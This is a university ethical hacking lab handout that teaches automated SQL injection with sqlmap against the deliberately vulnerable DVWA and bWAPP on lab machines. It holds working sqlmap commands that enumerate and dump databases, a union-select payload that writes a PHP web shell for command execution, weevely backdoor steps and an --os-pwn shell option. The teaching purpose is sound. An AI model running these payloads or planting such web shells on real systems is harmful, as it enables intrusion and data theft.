17/03/2021

AUTOMATED SQL Injection

Ethical Hacking Lab Exercise

Section 1 :- Setup the Virtual Machines

 Run the Bee-Box and the Kali (Web) virtual machines (using revert to
snapshot) and do the following exercises against DVWA.

Section 2 :- SQLMAP
SQLMap is a Linux based tool that is used by penetration testers to identify and
exploit SQL injection vulnerabilities in web application testing. SQLmap is very
effective and provides many capabilities to allow security testers to execute
queries automatically in the database in order to enumerate and to extract data
from it

Getting help.

From Kali, run a terminal and type

For the short version of help,

 sqlmap -h

For a more comprehensive version of help,

 sqlmap --help

1.1 Easily getting the configuration file.

We will be exploiting the SQL injection flaw in Damn Vulnerable Web App
that we have previously examined manually. The initialisation values such as
cookies may be captured and used in the command line variables. However, it is
easier to use a proxy, grab this information, save it in a file and poit to that in
the command line.

 Run OWASP ZAP from the menu Web Application Analysis. Note:
It’s slow to run.

 Run the Web browser and point it towards OWASP ZAP (port 8080).
Preferences|Advanced| Network then select the Settings command
button.

 Remember to clear the “No Proxy” text box (as shown below):-

C McLean School of Computing UAD Page 1 514733048.doc

 17/03/2021

 In Kali, browse to http://192.168.1.100/dvwa/login.php and login as

admin/password.

 Set DVWA Security to Low

 Browse to the Reflected SQL Injection Vulnerability and enter 1

OWASP ZAP has now captured the information we require and we can paste
it into a text file.

 Go to your desktop and create a file called dvwa.txt (right-click, New

Document).

 Right-Click and Open with Leafpad

 In ZAP, double-click on the GET command.

C McLean School of Computing UAD Page 2 514733048.doc

 17/03/2021

 We must now copy ALL the information contained in the REQUEST

and paste it into our dvwa.txt file (note the test value being submitted
and the cookies).

Using sqlmap to interrogate a Web site.

We can now use sqlmap to interrogate the DVWA application and the
underlying database. As will be shown, everything in the MySQL database may
be grabbed, not just the DVWA database.

Note that the SQLMAP command switch –r is read from our request file.

To get the technology that is being used on the web application, we can use the
fingerprint option –f.

sqlmap -r /root/Desktop/dvwa.txt -f

It should tell us that we are dealing with a MySQL database. To save time in
future queries, we will specify the database using –dbms

sqlmap -r /root/Desktop/dvwa.txt -f --dbms=MySQL

sqlmap -r /root/Desktop/dvwa.txt --dbms=MySQL --current-user

Try the following switches: -

--current-db Retrieve DBMS current database

--hostname Retrieve DBMS server hostname
--is-dba Detect if the DBMS current user is DBA
--users Enumerate DBMS users
--privileges Enumerate DBMS users privileges
--roles Enumerate DBMS users roles
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--schema Enumerate DBMS schema
--count Retrieve number of entries for table(s)

 Browse to /user/share/sqlmap/output to see all the information grabbed.

C McLean School of Computing UAD Page 3 514733048.doc

 17/03/2021

A systematic approach
SQLMAP can take a long time (and even be problematic) if a systematic
approach is not used. Blindly specifying “get everything” is not generally a
good idea (note that switches --dump-all or –a can be used at any point).

We will now take a systematic approach.

We would normally first require to determine the database names.

sqlmap -r /root/Desktop/dvwa.txt --dbms=MySQL --dbs

We can then choose which database to interrogate

sqlmap -r /root/Desktop/dvwa.txt --dbms=MySQL -D dvwa --table

We can then choose which table to interrogate

sqlmap -r /root/Desktop/dvwa.txt --dbms=MySQL -D dvwa -T users

--columns

sqlmap -r /root/Desktop/dvwa.txt --dbms=MySQL -D dvwa -T users

-dump

sqlmap -r /root/Desktop/dvwa.txt --dbms=MySQL --all

Get everything and dump it into a folder. Run the following and use defaults
when requested.

sqlmap -r /root/Desktop/dvwa.txt --dbms=MySQL -a --output-

dir=/root/Desktop --batch

 When it’s finished, examine the folder that has been created on your
desktop.

C McLean School of Computing UAD Page 4 514733048.doc

 17/03/2021

Uploading and accessing a PHP Shell.

SQLMAP does not give a shell against bWAPP & the bee-box virtual machine.

 From previous tests, it is found that /var/www/bWAPP/documents is

writeable. So try the following injection against the first SQL injection

blah' union select 1,"<?php echo

'<pre>';system($_REQUEST['cmd']);echo '</pre>'; ?>",1,1,1,1,1 into
outfile "/var/www/bWAPP/documents/shell1.php"--

 Now you should be able to browse to the page and issue shell commands using
documents/shell1.php?ls

1) Download last PySocks from python

site https://pypi.python.org/pypi/PySocks/
2) Unzip archive into /tmp/ directory
3) Run "chmod 755 /tmp/PySocks/setup.py"
4) Run build "/tmp/PySocks/setup.py build"
5) Run install "/tmp/PySocks/setup.py install"

Now you can connect to you backdoor from weevely.

 Try to get a shell using weevely under Kali linux.

The following tutorial may help.

https://evilzone.org/tutorials/upload-shell-with-sql-injection/

APPENDIX: Owning the machine *WINDOWS ONLY?*

To get a command prompt on the remote machine, use the following switch.

--os-pwn Prompt for an OOB shell, meterpreter or VNC

Use defaults, until you are asked the following then choose 2 - Shell

which payload do you want to use?

[1] Meterpreter (default)
[2] Shell
[3] VNC

C McLean School of Computing UAD Page 5 514733048.doc

 17/03/2021

C McLean School of Computing UAD Page 6 514733048.doc